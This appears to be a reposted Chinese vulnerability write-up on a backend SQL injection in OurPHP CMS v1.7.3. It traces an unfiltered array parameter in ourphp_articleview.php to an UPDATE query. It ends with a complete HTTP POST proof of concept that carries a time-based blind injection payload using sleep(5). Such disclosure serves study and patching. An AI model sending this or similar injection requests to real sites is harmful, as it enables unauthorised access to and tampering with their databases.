ourphp 最新版(v1.7.3) 后台sql注入
Posted Reborn
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ourphp 最新版(v1.7.3) 后台sql注入相关的知识,希望对你有一定的参考价值。
version:
<?php /******************************************************************************* * Ourphp - CMS建站系统 * Copyright (C) 2017 www.ourphp.net * 开发者:哈尔滨伟成科技有限公司 *******************************************************************************/ $ourphp_version="v1.7.3"; $ourphp_versiondate="20170615"; $ourphp_weixin="close"; $ourphp_apps="close"; $ourphp_alifuwu="close"; ?>
首先看 index.php
加载了下面这些文件
include \'./config/ourphp_code.php\'; include \'./config/ourphp_config.php\'; include \'./config/ourphp_version.php\'; include \'./config/ourphp_Language.php\'; include \'./function/ourphp_function.class.php\'; include \'./function/ourphp/Smarty.class.php\'; include \'./function/ourphp_system.class.php\'; include \'./function/ourphp_template.class.php\';
其中 ourphp_function.class.php 为一些安全过滤函数
批量搜索 $_POST
挑了一处跟进去
\\client\\manage\\ourphp_articleview.php 第71行
$query = $db -> update("`ourphp_article`","`OP_Articletitle` = \'".admin_sql($_POST["OP_Articletitle"])."\',`OP_Articleauthor` = \'".admin_sql($_POST["OP_Articleauthor"])."\',`OP_Articlesource` = \'".admin_sql($_POST["OP_Articlesource"])."\',`time` = \'".date("Y-m-d H:i:s")."\',`OP_Articlecontent` = \'".admin_sql($_POST["OP_Articlecontent"])."\',`OP_Tag` = \'".$wordtag."\',`OP_Class` = \'".$OP_Articleclass[0]."\',`OP_Lang` = \'".$OP_Articleclass[1]."\',`OP_Sorting` = \'".admin_sql($_POST["OP_Articlesorting"])."\',`OP_Attribute` = \'".$OP_Articleattribute."\',`OP_Url` = \'".admin_sql($_POST["OP_Articleurl"])."\',`OP_Description` = \'".compress_html($OP_Articlecontent)."\',`OP_Minimg` = \'".$OP_Minimg."\'","where id = ".intval($_GET[\'id\']));
发现大部分参数都经过了 admin_sql 函数的处理,但是发现 $OP_Articleattribute 没有经过admin_sql的处理
搜索 $OP_Articleattribute 发现
\\client\\manage\\ourphp_articleview.php 第47-51行
if (!empty($_POST["OP_Articleattribute"])){ $OP_Articleattribute = implode(\',\',$_POST["OP_Articleattribute"]); }else{ $OP_Articleattribute = \'\'; }
显然也没有经过处理
这里是update 的注入点 而且没有回显 所以不能用报错注入
根据上面对 $OP_Articleattribute 知道这里应该传入数组
监控sql语句为
update `ourphp_article` set `OP_Articletitle` = \'世界,你好!\',`OP_Articleauthor` = \'\',`OP_Articlesource` = \'\',`time` = \'2017-08-10 12:05:16\',`OP_Articlecontent` = \'世界,你好!\',`OP_Tag` = \'\',`OP_Class` = \'3\',`OP_Lang` = \'cn\',`OP_Sorting` = \'99\',`OP_Attribute` = \'aaaaaaaaaaaaa,xxxxxxxxx\'\',`OP_Url` = \'\',`OP_Description` = \'世界,你好!\',`OP_Minimg` = \'skin/noimage.png\' where id = 3
带入了单引号
最后给出poc
POST /client/manage/ourphp_articleview.php?ourphp_cms=edit&id=3&page=1 HTTP/1.1 Host: localhost.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=pnti0rkun1s1rrqhhl9n6lqdr1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 484 OP_Articleclass=3%7Ccn&OP_Articletitle=%E4%B8%96%E7%95%8C%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81&OP_Articleauthor=&OP_Articlesource=&a_upimg=skin%2Fnoimage.png&OP_Articlecontent=%E4%B8%96%E7%95%8C%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81&OP_Articlesorting=99&OP_Articleurl=&OP_Articletag=&OP_Articledescription=%E4%B8%96%E7%95%8C%EF%BC%8C%E4%BD%A0%E5%A5%BD%EF%BC%81&submit=%E6%8F%90%2B%E4%BA%A4&OP_Articleattribute[0]=aaaaaaaaaaaaa&OP_Articleattribute[1]=xxxxxxxxx\' where 1=1 and sleep(5)-- -
以上是关于ourphp 最新版(v1.7.3) 后台sql注入的主要内容,如果未能解决你的问题,请参考以下文章
收藏 | 2020 最新版《神经网络和深度学习》中文版pdf与PPT